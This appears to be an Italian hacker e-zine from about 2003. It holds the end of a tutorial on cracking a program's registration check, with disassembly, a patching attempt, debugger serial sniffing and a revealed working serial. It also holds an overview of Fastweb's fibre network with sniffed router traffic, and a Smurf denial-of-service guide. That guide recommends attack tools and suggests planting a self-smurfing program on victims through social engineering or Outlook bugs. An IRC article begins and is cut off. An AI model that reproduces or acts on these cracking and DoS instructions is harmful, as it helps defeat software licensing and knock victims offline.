CODE:00469E75                 mov     ecx, offset aError_0 ; "Error!"
CODE:00469E7A                 mov     edx, offset aInvalidRegistr ; "Invalid
Registration Code"

Hehe,  abbiamo quasi finito miei cari :) Proviamo prima di tutto a vedere  se  è
uno  di quei programmi lameri che  cambiando un semplice jmp o noppandolo  (come
in questo caso) ci registra con qualsiasi serial. Andiamo qua:

CODE:00469E21                 call    sub_4619A8
CODE:00469E26                 cmp     al, 1
CODE:00469E28                 jnz     short loc_469E73

E  cambiamo il jnz in due nop. Proviamo il prog e vediamo che non parte,  almeno
a  me fa cosi :P Allora passiamo proprio a farci sto serial fishing.  Anzi,  per
essere  +  corretti,  è  +  uno  sniffing,  hihi  :)  Entriamo  in  questa  call
(sub_4619A8) e vediamo cosa ci attende...

CODE:004619A8                 push    ebp
CODE:004619A9                 mov     ebp, esp
CODE:004619AB                 add     esp, 0FFFFFFF0h
CODE:004619AE                 push    ebx
CODE:004619AF                 xor     ebx, ebx
CODE:004619B1                 mov     [ebp+var_10], ebx
CODE:004619B4                 mov     [ebp+var_C], ebx
CODE:004619B7                 mov     [ebp+var_8], ecx
CODE:004619BA                 mov     [ebp+var_4], edx
CODE:004619BD                 mov     ebx, eax
CODE:004619BF                 mov     eax, [ebp+var_4]
CODE:004619C2                 call    sub_404A4C
CODE:004619C7                 mov     eax, [ebp+var_8]
CODE:004619CA                 call    sub_404A4C
CODE:004619CF                 mov     eax, [ebp+arg_0]
CODE:004619D2                 call    sub_404A4C
CODE:004619D7                 xor     eax, eax
CODE:004619D9                 push    ebp
CODE:004619DA                 push    offset loc_461A92
CODE:004619DF                 push    dword ptr fs:[eax]
CODE:004619E2                 mov     fs:[eax], esp
CODE:004619E5                 mov     eax, [ebp+var_4]
CODE:004619E8                 call    sub_404864
CODE:004619ED                 cmp     eax, [ebx+4Ch]
CODE:004619F0                 jg      short loc_461A0B
CODE:004619F2                 mov     eax, [ebp+var_4]
CODE:004619F5                 call    sub_404864
CODE:004619FA                 cmp     eax, [ebx+50h]
CODE:004619FD                 jl      short loc_461A0B
CODE:004619FF                 mov     eax, [ebp+arg_0]
CODE:00461A02                 call    sub_404864
CODE:00461A07                 test    eax, eax
CODE:00461A09                 jnz     short loc_461A0F
CODE:00461A0B
CODE:00461A0B loc_461A0B:
CODE:00461A0B                                         ; sub_4619A8+55j
CODE:00461A0B                 xor     ebx, ebx
CODE:00461A0D                 jmp     short loc_461A6F
CODE:00461A0F ; -----------------------------------------------------------
CODE:00461A0F
CODE:00461A0F loc_461A0F:
CODE:00461A0F                 lea     edx, [ebp+var_C]
CODE:00461A12                 mov     eax, [ebp+arg_0]
CODE:00461A15                 call    sub_408664
CODE:00461A1A                 mov     edx, [ebp+var_C]
CODE:00461A1D                 lea     eax, [ebp+arg_0]
CODE:00461A20                 call    sub_404644
CODE:00461A25                 lea     ecx, [ebp+var_10]
CODE:00461A28                 mov     edx, [ebp+var_4]
CODE:00461A2B                 mov     eax, ebx
CODE:00461A2D                 call    sub_4616A4
CODE:00461A32                 mov     eax, [ebp+var_10]
CODE:00461A35                 mov     edx, [ebp+arg_0]
CODE:00461A38                 call    sub_4086DC
CODE:00461A3D                 test    eax, eax
CODE:00461A3F                 jz      short loc_461A45
CODE:00461A41                 xor     ebx, ebx
CODE:00461A43                 jmp     short loc_461A6F
CODE:00461A45 ; ----------------------------------------------------------
CODE:00461A45
CODE:00461A45 loc_461A45:
CODE:00461A45                 lea     eax, [ebx+48h]
CODE:00461A48                 mov     edx, [ebp+var_4]
CODE:00461A4B                 call    sub_404600
CODE:00461A50                 lea     eax, [ebx+54h]
CODE:00461A53                 mov     edx, [ebp+var_8]
CODE:00461A56                 call    sub_404600
CODE:00461A5B                 lea     eax, [ebx+5Ch]
CODE:00461A5E                 mov     edx, [ebp+arg_0]
CODE:00461A61                 call    sub_404600
CODE:00461A66                 mov     eax, ebx
CODE:00461A68                 call    sub_461C28
CODE:00461A6D                 mov     bl, 1
CODE:00461A6F
CODE:00461A6F loc_461A6F:
CODE:00461A6F                                         ; sub_4619A8+9Bj
CODE:00461A6F                 xor     eax, eax
CODE:00461A71                 pop     edx
CODE:00461A72                 pop     ecx
CODE:00461A73                 pop     ecx
CODE:00461A74                 mov     fs:[eax], edx
CODE:00461A77                 push    offset loc_461A99
CODE:00461A7C
CODE:00461A7C loc_461A7C:
CODE:00461A7C                 lea     eax, [ebp+var_10]
CODE:00461A7F                 mov     edx, 4
CODE:00461A84                 call    sub_4045D0
CODE:00461A89                 lea     eax, [ebp+arg_0]
CODE:00461A8C                 call    sub_4045AC
CODE:00461A91                 retn
CODE:00461A91 sub_4619A8      endp ; sp = -1Ch

Uff,  quanto  codice  ho subito pensato, ma meno male che  non  ce  lo  dobbiamo
studiare per fare un keygen, anche perché non ho proprio testa per queste   cose
ora  (hehe,  ricordi Eimiar, NON HO TESTA ;) e quindi steppiamo un  po  con   il
nostro  caro  OllyDbg  e  vediamo come cambiano i registri  e...MA!  AHAN!  Cosa
vediamo  qui? Hehe, ce il serial bello che inserito in un registro e il   serial
messo  da  noi in un altro! Hahahha, ma daiiii :P Tra le altre cose, il   serial
deve  cmq  essere lungo almeno 12 caratteri, il mio in questo  caso  (ho   messo
ovviamente  come username Graftal) è 1A503E0D59BF . Mettiamo quindi  il   serial
trovato nell'apposito campo e andiamo alla grande!! :))))

_____________
|NOTE FiNALi|

Huh, finalmente, siamo arrivati alla fine di questa guida raga...Com'era?  Come?
Una  schifezza?  Hahaha, ci sono abituato :P Vabbe, a parte tutto  quanto   cmq,
spero  solo  che abbiate imparato qualcosa, niente di +, perché il   cracking  è
un'arte, una curiosita, e alcuni direbbero pure: "Un modo per dire al programma:
FOTTIT"...ahem,  avete  capito :D ok, penso di non essermi  scordato  nulla,  vi
ricordo  sempre  che per qualsiasi  domanda (ehi, non proprio qualsiasi  :P)  mi
trovate sempre allo stesso indirizzo email che trovate scritto all'inizio  della
guida.  Perfetto, penso  che si possa passare ai ringraziamente e concludere  il
tutto :)

________________
|RiNGRAZiAMENTi|

Partiamo  subito  col citare active85k[] (te l'avevo detto che  avevi  il  posto
d'onore  :P)  perché è stato quello che mi ha aiutato di + in  questi  giorni  e
quindi lo vorrei davvero ringraziare...e dirgli che non sto leccando il culo   a
nessuno,  ghgh  :))) In secondo luogo, ringrazio tutti quelli  di  #informazione
libera, tutta la crew che non ha nulla da fare e sta sul chan :P Tutti quelli di
#graftal (puo sembrar strano, ma siamo arrivati a picchi di  6 persone nel chan!
gh),  anche #focushack e SiberianSTAR che sara da un mese  che non lo vedo  come
minimo...Poi anche Eimiar che mi sta convertendo piano piano alla programmazione
in  Delphi...Oltre  a quella C++ eh, che il C++ è il mio astro,  la  mia  stella
polare =)) Ovviamente kOrn[CsA] non me lo scordo mai, thx amico per tutto quanto
:)))

_______
|ADDiO|

Adios raga e alla proxima guida...e ricordate SEMPRE:

If freedom is outlawed, only outlaws will have freedom...

;)

Copyright 2003, tutti i diritti riservati.
Guida scritta interamente da Graftal il giovedì 30 ottobre 2003.



+--------------------------------------------------------------[open the file]-+
|[ NETWORKING & SIMILI ]                                                       | 
|-- Apriamo Fastweb                                                            | 
|-- Tailot <webmaster@tailot.zzn.com>                                          |
|                     _________________________________________________________| 
|____________________/ 
La   danza   delle   streghe   signore  di  paura....heheheh   tranquilli   sono
tailot.....Ormai la rete è piena di smanettoni che possiedono connessioni  ultra
veloci,  mi riferisco alla fibra ottica che ci viene data da fastweb......  oggi
vi  parlerò di "Architettura della rete in fibra ottica di Fastweb e  della  sua
sicurezza"..... un ringraziamento va fatto a plany per il magico  aiuto  !!!  La
rete  in  fibra  ottica di Fastweb è di tipo MAN – Metropolitan Area  Network  –
ossia  una rete locale LAN di notevoli dimensioni in fibra ottica (anzichè UTP),
estesa  su  un’area  metropolitana  ->  il  trasporto  IP  avviene  direttamente
sul   livello    ottico,    tramite    la    tecnologia    IP    su    WDM     -
Wavelength   Division Multiplexing = trasmissione con multiplazione a  divisione
di  lunghezza  d'onda  –  che    consente     quindi     di     eliminare     il
ricorso      all’infrastruttura     ATM     –  Asynchronous  Transfer   Mode   -
utilizzata per esempio dai provider ADSL. Tale tecnologia consente in  modo  più
che  efficiente  di sfruttare l’ampia banda trasmissiva di una  fibra  ottica  =
variando  la  lunghezza d'onda dei trasmettitori è   possibile   aggregare    in
una    singola    fibra    decine   di   canali   trasmissivi, indipendentemente
dalle  proprietà  di  codifica  e di bit-rate.    Dato  che  non  si  tratta  di
concetti/termini alla portata di tutti, vi indico una serie di collegamenti dove
potete reperire informazioni esplicative :

http://nora.ing.unibs.it/didattica/att_tesi/sistemi.html - Sistemi WDM
http://www.metroweb.it/rete.htm - Infrastruttura della rete in fibra ottica FW
http://www2.labs.agilent.com/Ken_Poulton/ftth/ - Documentazione su fibre ottiche
http://www.bredband.com - Partner di Fastweb per la realizzazione della rete
http://www.networkingitalia.it/atm/ - Documentazione NetworkingItalia su ATM

La suddivisione della rete in fibra ottica Fastweb è così fatta :
 - Città (Milano+Hinterland, Roma, Torino, Genova, Napoli, Bologna)
 - Pop (zona della città) - Minipop (ID numerico)
 - Area Elementare (ID numerico)
 - Progressivo Edificio (ID numerico).
Dallo switch della sede centrale partono cavi in fibra ottica che terminano su i
Router   di   zona  (Pop),  su  cui  terminano  e  ripartono   link   in   fibra
verso   gli  Switch Cisco Catalyst 6506 di quartiere (Minipop). Questi  apparati
lavorano  in  coppia   e   raccolgono   tutto   il   traffico    delle    catene
di    switch    condominiali  associati   quell’area   ->   in   condizioni   di
massimo  carico,  possono  gestire  un traffico di 6 Gigabit al secondo.  Mhmmmm
Da questi ultimi partono quindi i cavi che arrivano fino allo "switch utenza"  =
Cisco  Catalyst 3524XL (operante a Layer2) o Catalyst 2950, la cui installazione
varia  a seconda dell’abbonamento, come spiegherò più avanti -> è il punto  dove
termina  la  fibra  e  partono  i  cavi  di  rilegamento  utente  :  UTP5   10bT
oppure  100bFX  .  L’utilizzo  del  cavo  100bFX  è  legato  sia  agli  apparati
di   rete  lato utenza che a situazioni problematiche per il passaggio dei  cavi
[ved. Canaline ‘intasatè].  Le  utenze  sono  connesse  a  porte  di  tipo Fast-
Ethernet  .   Entrambi   i   lati   della  catena   terminano  ovviamente  sulle
rispettive  porte della coppia di switch (Cisco 6506) collocati nella  struttura
MiniPop,  A questo punto comincia una serie di differenze legato all’abbonamento
in  esame, ulteriormente  accentuata  dalla  partenza  delle  offerte  ADSL   ->
infatti,  per quest’ultima  categoria  di  utenze,  gli  apparati  di  rete   di
terminazione  della fibra si trovano nelle centrali telefoniche, alle quali  gli
utenti  sono  connessi  tramite una linea ADSL.  A   seconda   della   tipologia
dell’abbonamento,   variano  quindi  i  dispositivi  di terminazione  rete  lato
utente  ->  per  le  utenze business/aziendali sono previsti dispositivi  router
Cisco  (e.g. Cisco 1751,2621 e 3640), acquistabili o forniti in comodato  d’uso,
mentre  per  quelle  SOHO/residenziali la scelta cade sugli HAG  =  Home  Access
Gateway.   Per i contratti business/aziendali sono previsti invece router  Cisco
lato  utenza  o  soluzioni tramite Cisco IP-Phone (Base/Executive),  che  devono
gestire servizi evoluti    di    rete/telefonia    ->    infatti    per     tali
clienti    Fastweb    prevede l’installazione/configurazione  di  apparati   per
gestire   servizi   avanzati  =  VPN aziendale, linee ISDN BASE/PRI,  centralini
PABX. Passando  ad  analizzare  l’instradamento  delle  connessioni  TCP/IP   si
rilevano  i seguenti passaggi :

    Utenza  --------- Gateway/Router ------- Gateway/Router con IP  pubblico  IP
privato          Interfacce IP privati     IP Pubblici

La   rete  in  fibra  ottica  Fastweb  è  principalmente  costituita  da  anelli
che coprono l’area metropolitana.  La rete in fibra ottica di   Fastweb   è   di
tipo  ridondato   =  raddoppiati sia    gli    apparati    di rete  che  i  vari
impianti,      come     quelli  di    alimentazione    e    di  condizionamento.
L’architettura scelta prevede  una  gerarchia  a 3  livelli  ->  nel  caso della
MAN    della   città di Milano, il CORE comprende  7  POP  primari mentre     il
livello     di concentrazione    18    POP secondari.   Inoltre il 1° livello  è
una     maglia     chiusa    = tutti    i    POP    primari sono   interconnessi
tra di  loro,  per  garantire maggiori  affidabilità  e sicurezza.

Il  3° livello è quello di  accesso, dove sono presenti i  minipop, dai quali si
diramano i trunk in fibra verso le aree elementari, dove sono presenti appunto i
palazzi cablati, sia di tipo passed [ancora non connessi] che connected  ->  ciò
vale  per  le  utenze  residenziali/SOHO  e  piccole/medie  aziende,  visto  che
le  grandi  aziende  sono  collegate  direttamente  al  2°  anello,  anche   con
eventuali collegamenti di backup in fibra. La  connessione  delle  aziende   TOP
è   diretta   al  POP  per  consentire  sia  maggiori capacità  di   banda   che
l’implementazione   di   alcuni  servizi  (connessioni   VPN   o  servizi  fonia
evoluti),  che  altrimenti non sarebbe possibile utilizzare per  le  limitazioni
che    la    formula    base   impone.   Un   altro   metodo   di    connessione
utilizzabile da questo tipo di clientela (oltre a quello su rete IP) è quello su
SDH,   dove   si   ha  un  link  E3  (34  Megabit/s)  o  STM1  (155   Megabit/s)
verso  un apparato  dedicato  presente  nel  pop.  In  questo  caso,  il  router
presso   l’utenza (e.g. Cisco 7204) si interfaccia con un armadio ADM  (Add/Drop
Multiplexer)  che  a  sua volta si collega ad un ADM nel POP.  Nota:  I   router
utilizzati   all’interno   dei  POP  Fastweb   sono   prodotti   da   Cisco   ed
appartengono alla serie 12000 -> potete trovare informazioni tecniche in  merito
a  tali  apparati  su : > http://www.cisco.com/univercd/cc/td/doc/pcat/12000.htm
>        http://www.cisco.com/univercd/cc/td/doc/product/core/cis12000/index.htm
All’interno   delle   aree  elementari  vi  sono  dei  pozzetti   di   giunzione
(daisy   chain)    dai    quali   si   dipartono   i    drop    =    diramazioni
corrispondenti  ai  tratti finale di fibra, che viene introdotta nel palazzo del
cliente.   Vediamo     come    avviene    il    cablaggio     degli     stabili,
soprattutto   in   ambito residenziale. Viene     fatto     un      foro      di
pochi centimetri  (da  6.5  a  11  cm  circa), attraverso  il  quale  passa   la
fibra  armata,   ossia   protetta   da   un   tubo flessibile in plastica. Viene
quindi  installato  in un apposito armadio (situato nei locali  tecnologici)  lo
switch  condominiale, che   è   un   Cisco   Catalyst   3524XL    o  2950  a  24
porte.  Al    fine    di    ottimizzare    l’utilizzo  degli   apparati,   viene
attuato  anche il  clustering  =  si  spilla  uno  drop slave dallo switch a box
Cisco    a  12 porte    presenti    in    altri   palazzi. Unica     limitazione
=      si      possono collegare     massimo     6     box     ad     uno switch
master.


Per   ulteriori  informazioni  sullo  switch  Cisco  Catalyst  3524  XL   potete
andare all’indirizzo http://www.cisco.com/univercd/cc/td/doc/pcat/ca3500.htm
Tramite   una  tale  configurazione  un  unico  switch  funziona  come  apparato
attivo  per  più  edifici, riconducibili ad una stessa  area  cluster,  evitando
sprechi  di risorse per cablare determinati stabili (e.g. multi-scala o  corte).
Inizialmente   Fastweb  realizzava  il  collegamento  tra   lo   switch   e   le
utenze  collegate  nel  medesimo  palazzo  attraverso  normali  cavi   di   rete
UTP-5   ->   tale  sistema   è  stato  sostituito  con   la   realizzazione   di
collegamenti   verticali   in  fibra  ottica.  Ciò    ha    richiesto     quindi
l’utilizzo   di   convertitori elettro-ottici   (Media   Converter)    per    la
porta    dello switch ed (a seconda dei casi) anche per la terminazione di  rete
dell’utenza.  Fastweb  ha  impiegato più soluzioni di Media  Converter,  ma  una
abbastanza   diffusa  è  quella  Volition,  della  quale trovate ulteriori  info
su  http://www.3m.com/volition/ . Un’ultima  nota  riguarda  la   configurazione
dei     dispositivi    Fastweb    per    quanto   riguarda   gli   utenti   base
(residenziale/SOHO)  su fibra -> la figura sotto riporta uno  schema  possibile,
con  il  ribaltamento delle prese secondarie di fonia su  FW.  Una    nota    in
merito    alle  porte  RJ-45  dati  dell’HAG riguarda il limite dei MAC  Address
registrabili   dallo switch -> questo vuol dire che   la    connessione    anche
non simultanea di un ulteriore   dispositivo   può comportare  la  caduta  della
porta sullo switch.

A  seconda della tipologia di abbonamento, vi è un sistema sullo “switch utenza”
(Cisco   Catalyst   3524XL   o   2950)  che  provvede   a   registrare   i   MAC
Address   in transito  sulle  singole  porte  ->  ciò  consente  a  Fastweb   di
far    rispettare   i  limiti   contrattuali   sul   numero   dei    dispositivi
collegabili,  compresa  la  CPE p.es.: >UTENZE RESIDENZIALI 1 MAC = Fibra  piani
Internet  a  Consumo senza Videostation/WebDVD 2 MAC = Fibra  piani  Internet  a
Consumo con Videostation/WebDVD 6 MAC = Fibra Tutto senza limiti/Internet  senza
Limiti >UTENZE PROFESSIONALI 1 MAC = Fibra Easy Inclusive Site/Fibra Office (con
router 2621 – 3640) 2 MAC = Fibra Easy Inclusive Professional 3 MAC = Fibra Easy
Inclusive  Professional + Opzione Desk Questo  comporta  che  vi  possa   essere
una   caduta   del  collegamento  in  caso  di superamento della soglia  limite,
dovuto  p.es.  alla sostituzione di un’interfaccia di rete ->  una  soluzione  è
l’aggiunta di un computer o apparato   con funzioni di NAT (o proxy). In  questo
modo  è  possibile  collegare/scollegare sistemi come notebook  senza  problemi,
sebbene  vi possano essere svantaggi legati alla gestione del sistema, e  quindi
alla  configurazione  delle applicazioni dei sistemi collegati.    FastWeb    ha
provveduto    però,    sia   con   le   ultime   installazioni    di    catalyst
condominiali  Cisco  2950  che  tramite  aggiornamenti  del  IOS,  ad  impostare
una policy  per  cui  non  si  ha  l’interruzione  di  collegamento  (porta   in
shutdown)   e    periodicamente  avviene lo svuotamento  del  registro  dei  MAC
Address,  in  modo da non  mantenere  memorizzati  (come  prima)  identificativi
fisici  di  dispositivi  di rete non in uso.

Dopo  questa  bella descrizione della struttura Quanto sia sicuro  navigare  con
fastweb.

Leggendo        le       FAQ/Info-tecniche       presenti        sul        sito
http://www.fastweb.it   si incontra la seguente frase, che riporto  testualmente
:  “Il  fatto  di avere un indirizzo privato, non pregiudica in  alcun  modo  la
normale  navigazione     Internet:    a     tale     fine     la     connessione
FastWeb     è    del    tutto assimilabile  ad  una  connessione  con  indirizzo
pubblico,   solo  molto,  molto  più veloce e sicura.” Chi è arrivato  a  questo
punto  avrà  già  letto  ampiamente delle limitazioni  legate  all’indirizzo  IP
privato  e al NAT/PAT delle connessioni base FastWeb, per cui mi concentro  solo
sull’aspetto  sicurezza. Da  un  lato  è  vero  che   l’architettura   di   rete
consente   di   non   essere   visibili direttamente dall’esterno  e  quindi  su
Internet  ->  dall’altro però non elimina né i  problemi  legati  ad   infezioni
con   trojan/backdoor   né   i  rischi  associati  alla gestione  delle  risorse
condivise.  Infatti  si è sempre visibili all’interno  della  rete   FastWeb   e
quindi   comunque  da  altre  utenze.  Nei  successivi  articoli   tali  aspetti
sono   trattati  in  dettaglio  assieme  alle  misure  di  protezione   che   un
utente FastWeb può/deve adottare.   In   effetti   la   rete   Fastweb,   almeno
per    quanto   riguarda   la   configurazione residenziale/SOHO, risulta essere
una  rete  locale LAN di tipo switched -> questo spiega  perchè  Fastweb   abbia
attivato   determinate   precauzioni  contro  le   varie  tecniche  di  sniffing
all'interno  della  rete (e.g. arp poisoning). Lo scopo è  infatti  evitare  che
qualcuno,  utilizzando uno sniffer/interceptor/logger  per  reti  LAN  switched,
possa    non    solo    operare    una  scansione     passiva     della     rete
[dispositivi,      porte     aperte,     etc.]     ma      anche    intercettare
username/password e persino dati su connessione HTTPS – SSL, anche nel  caso  in
cui   il  collegamento  avvenga  tramite  il  Socks  proxy  interno  della  rete
Fastweb.  Prima  della migrazione all’attuale architettura di rete  [IP  privati
“riservati”  assegnati   alle   singole  reti   metropolitane   MAN    con   uno
sniffer    infatti   era   possibile   tranquillamente   vedere   il    traffico
multicast EIGRP e HSRP generato dai router in classe 172.x.x.x :
 <traffico EIGRP> 19:24:12.372791 172.xx.xx.2 > 224.0.0.10:  ip-proto-88 40 [tos
 0xc0]
 (ttl 2, id 0, len 60)
 19:24:13.132349 172.xx.xx.3 > 224.0.0.10:  ip-proto-88 40 [tos 0xc0]
 (ttl 2, id 0, len 60)
 </traffico EIGRP>
 <traffico HSRP>
 19:24:10.004537 172.xx.xx.2.1985 > 224.0.0.2.1985:  [udp sum ok] udp 20
  [tos 0xc0]  (ttl 2, id 0, len 48)
 19:24:11.536225 172.xx.xx.3.1985 > 224.0.0.2.1985:  [udp sum ok] udp 20
   [tos 0xc0]  (ttl 2, id 0, len 48)
 19:24:12.944679 172.xx.xx.2.1985 > 224.0.0.2.1985:  [udp sum ok] udp 20
  [tos 0xc0]  (ttl 2, id 0, len 48)
 </traffico HSRP>

Un’altra  nota riguarda i servizi email forniti agli utenti -> FastWeb  fornisce
ai     suoi     utenti     residenziali/SOHO     caselle     email     attestate
sul    dominio fastwebnet.it (nomeazienda.fastwebnet.it per i SOHO) da 10 MB per
i  residenziali e  da  30  MB  per  i  SOHO,  entrambe  con  la  possibilità  di
attivare   servizi   di  antivirus e di antispamming  direttamente  sul  server.
Ovviamente     suggerisco     di    attivare    tali     servizi,     prevedendo
comunque    di installare  in  locale  almeno  un  servizio  di  antivirus  dato
che   il  servizio fornito  da  FastWeb  in  determinati  casi  non  è  riuscito
a   bloccare   alcuni  virus allegati alle mail. Nota: FastWeb    fornisce    ai
suoi   utenti   per   i   relativi   servizi   password   di   prima connessione
invitandoli  poi a cambiarle una volta fatto il primo accesso  ->  ciò  vale  in
particolar  modo per il servizio email soprattutto per salvaguardare la  privacy
delle   comunicazioni.  Qualora  vogliate  creare  nuove   caselle   email   (in
ottemperanza  ovviamente  con il numero limite previsto  dal  vostro  contratto)
FastWeb  non  ha  ancora  provveduto  a rilasciare   un   sistema   sicuro   per
effettuare   tale  processo  online.  Pertanto potete farlo solo  in  2  modi  :
1.Contattando   telefonicamente  il  servizio  clienti.   Per   ora   è   ancora
possibile  farlo  gratuitamente dal 192.193 anche se non  è  escluso  che  venga
spostato  tra  i servizi forniti dal nuovo numero a pagamento.   2.Spedendo   un
email   all’indirizzo   fastweb@fastweb.it   ,   indicando   come   mittente  il
vostro      indirizzo     email     principale     FastWeb     associato      al
contratto     e  specificando   i   vostri   dati   di   utenza   [nome/cognome,
azienda,   ragione  sociale, etc.].  Tuttavia  questo  sistema  non   garantisce
una  creazione  immediata  della nuova casella nelle 24 ore.

(*  A  QUESTO  PUNTO NON MI RIMANE CHE SALUTARE UN INFINITA' DI  GENTE........OK
VA....SALUTO TUTTA INFORMAZIONELIBERA.....DAI RAGAZZIIIIIII

BY TAILOT
                              Per ulteriori informazioni:
                              WWW.TAILOT.CJB.NET
                              webmaster@tailot.zzn.com



+--------------------------------------------------------------[open the file]-+
|[ FOR NEWBIE ]                                                                | 
|-- <<Pizza con smurf ben cotto, grazie>>                                      |
|-- LordScinawa <is_LordScinawa@email.it>                                      |
|                     _________________________________________________________| 
|____________________/
Indice:
1)Cosa E' Lo Smurf?
2)Come Si Svolge Un Attacco Smurf?
3)The Other Options
4)Come Si Attua Un Attacco Smurf?

Bene  raga, ci siamo, adesso aprite grande (come dal dentista) questa pagina  <-
sennò mi sballate la grafica e cominciate a leggere...

1)Cosa E' Lo Smurf?_____________________________________________________________
Lo  smurf  è un attacco di tipo DOSche mira ad esaurire la banda di un  computer
tramite la risposta simultanea di una rete di PC ad un PING. Il ping, (pacchetto
ICMP  con  un  mesaggio di ECHO REQUEST) (richiesta di eco  è  inteso  in  senso
figurativo,  si  intende richiesta di risposta) è inviato  ad  un  indirizzo  di
broadcast  che  provvede a rispondere simultaneamente con tutti gli  host  della
sottorete.  Per  fare si che la risposta giunga al computer da  disconnettere  è
sufficiente  spoofare  il  proprio IP con l'Ip della  vittima.  Lo  smurf  è  la
combinazione perfetta tra l'IP spoofing e la risposta multipla di una  sottorete
al fine di effettuare un attacco DOS.
Nota
ICMP sta per Internet Control Message Protocol. Quersto protocollo si occupa  di
inviare messaggi di controllo durante una sessione IP.

2)Come Si Svolge Un Attacco Smurf? _____________________________________________


                        A = Attaccante
                        V=Vittima
                        B=Indirizzo di broadcast
                                H        H              H=host,  computer  della
sottorete
A------------|      /       /
    |                 ----/___/____H
    |------------------B----__ -------------H
    |        \        \
V------------|       \        \
                 H     H




Il computer V se ne sta per i fatti sui, ignaro di quello che accade
Il computer A spoofa il proprio IP fingendosi V
Il computer A senda un pacchetto ICMP con il campo ECHO REQUEST al computer B
Il  computer  B  trasmette il pacchetto a sua volta a  tutti  i  computer  della
sprpria sottorete
Tutti  i computer H, appena ricevuto il pacchetto ICMP rispondono a loro  volta,
non ad A bensì a V causandone la disconnessione
Il computer V è disconnesso :-(((

Facendo  un pochi di calcoli, se noi spediamo per un secondo 5Kb di pacchetti  e
li  destiniamo ad una sottorete di 50 PC al tipo arrivano peacchetti per un peso
totale di 250Kb

3)The Other Options ____________________________________________________________
Questa  idea  molto  simpatica mi è saltata in mentre stavo  pensando  a  questa
magnifica  tecnica:  Mi sono chiesto: ma perchè fare partire  il  PING  dal  mio
computer  e  non direttamente dal PC vittima? Si potrebbe scrivere un  programma
(Eafkuor  [mito!!!!]) cheesegue uno smurf a se stesso, cioè  senza  spoofare  il
proprio  IP; Successivamente si potrebbe fare correre il programma dall computer
vittima  al  fine di disconnetterlo. Spetta a noi come fare per fare correre  il
programma sul computer della vittima... Io consiglio ai più estroversi, scrausi,
secchioni, fantasiosi, cazzuti e precisini di usare l'ingegneria sociale, mentre
consiglio ai newbie (così ci esercitiamo) di usare uno dei tanti (troppi) bug di
Outlook    (mi  pare di avere scritto qualcosa in proposito, ma cmq approfondirò
il discorso in un tutorial con Scorpio [mito!!!!] )

Perchè fare questo?
Perchè  facendo così evito di lasciare tracce sul web, evito di spoofare il  mio
IP ed evito in generale :(lol)

4)Come Si Attua Un Attacco Smurf? ______________________________________________
Questo  attacco  è  molto semplice da attuare, infatti basta  solo  eseguire  un
programma, immettere i dati e premere il pulsantino "smurf" Di solito i campi da
impostare per questo genere di programma sono i seguenti:

Numero di Pacchetti:    Il numero di pacchetti che vogliamo sendare
Sorgente:               L'IP della vittima che comparirà nel pacchetto ICMP
Destinazione:           L'IP del computer broadcaster della rete sfruttata
TTL  :                  Ragazzi,  dovreste  saperlo da  soli,  Time  To  Live  di  
                        un pacchetto (ritengo opportuno impostarlo a 128 host  da 
                        passare
Peso:                   Il peso del pacchetto
Ritardo tra i  pacchetti Il tempo che deve passare tra l'invio di un pacchette  e
del suo successivo.

Il nome di alcuni programmi che vi posso dare sono
SMURF2K

    Pregi:
    -Ha un interfaccia molto frendly user
    Difetti
    -Ha pochi parametri da impostare
        Voto 8

WINSMURF

    Pregi
    -Ha molti più parametri da impostare
    -Ha una grafica leggermente lamer :-)
    Difetti
     -Si  può  usare  solo se si ha il modem installato su  una  porta  com,  in
compenso però si può scegliere quale
        Voto 9

________________________________________________________________________________
Purtroppo, questo programma si occupa solo su come svolgere un attacco di questo
tipo, e non si occupa di come difendersi, e come fare a non esserne intermediari
di  un  attacco di questo tipo. Le informazioni che non avete trovato in  questo
tuto,  le  potete  trovare  sul sito della gnomixland  (www.gnomixland.com)  che
contiene  la  ricerca  sullo  smurf di Craig A.  Huegen,  una  pecca  di  questo
documento  è che risale al 2000 e non è stato ancora  aggiornato da i  webmaster
di gnomixland...                               
Bye!!!! LordScinawa





+--------------------------------------------------------------[open the file]-+
|[ FOR NEWBIE ]                                                                |
|-- Irc Mirc e il suo DCC buggato                                              |
|-- Cyberdude <cyberdudeIL@libero.it>                                          |
|                     _________________________________________________________| 
|____________________/ 
Ave  a voi oh amanti delle chat!! Oh cacchio dovrei smetterla di dire tutte  ste
minghiate  ogni volta che scrivo un articolo ihihihi ma dopo tutto che  vogliamo
farci??  Voi ora vi chiederete ... ma sto pollo non ha niente di meglio da  fare
che  stare  dalla mattina alla sera avanti al PC a scrivere articoli  e  cazzate
varie?  Boh!!  Hihih  la risposta è no belli miei perché  io  conduco  una  vita
normale  come  tutti voi, vado a scuola (purtroppo) , mangio ,  dormo,  gioco  a
calcio,  a  tennis  ,  esco  con  gli amici e amiche,  aiuto  le  vecchiette  ad
attraversare  la  strada (è successo una sola volta... ma comunque  l'ho  fatto)
sfotto  i  miei  fratelli... esco con la mia fidanzata (l ho detto appositamente
per ultimo perché è la cosa più importante), insomma ... una vita movimentata la
mia! Però oggi è successo qualcosa di diverso, oggi mi sono svegliato con un mal
d'orecchio  che  è a dir poco esagerato e quindi ... non sono andato  a  scuola,
sono  solo  soletto io e il mio PC ! e che faccio, non scrivo un articolo?  Dopo
queste  stringhe di testo assolutamente inutili direi che possiamo  iniziare  il
vero  e  proprio  articolo!!!  Dunque voglio  presentarvi  l'argomento  in  modo
indiretto ... io vi faccio una domanda e voi dovete provare a indovinare di cosa
sto  parlando  ok? Dai proviamo si tratta di un sistema che apparse  sulla  rete
dell'esercito  statunitense molto tempo fa anche se non riuscì a prendere  piede
nella comunità... vabbè ragazzi se vogliamo continuare così non  la finiamo più,
sto  parlando  di IRC hehehe avete capito bene, quel sistema che ora  usate  per
chattare  hihihi  :)  IRC  si  è sviluppato da un programma  scritto  da  Jarkko
Oikarinen  dell'università di Oulu nell'estate del  1988  (Oulu  è  una  piccola
cittadina  sulla  cost  nord occidentale della Finlandia)...  eh  si  se  adesso
chattate dovete ringraziare un finlandese, comunque Oikarinen ha aggiunto alcune
estensione ad una base multi-utente del classico talk, un mezzo di comunicazione
dal  vivo tra due utenti Internet, che aveva lo svantaggio di non supportare  la
comunicazione tra tre o più persone. Naturalmente l'IRC originale era molto  più
semplice  delle  versioni  moderne, che hanno  reso  IRC  uno  dei  sistemi  più
complessi  su  Internet...  per quelli che sono interessati  alla  storia  dello
sviluppo di IRC guardatevi un po' che chicca :

Inizialmente  IRC era una questione esclusivamente finlandese e  prevalentemente
destinata  agli studi finlandesi. Subito dopo la sua creazione, IRC fu esportato
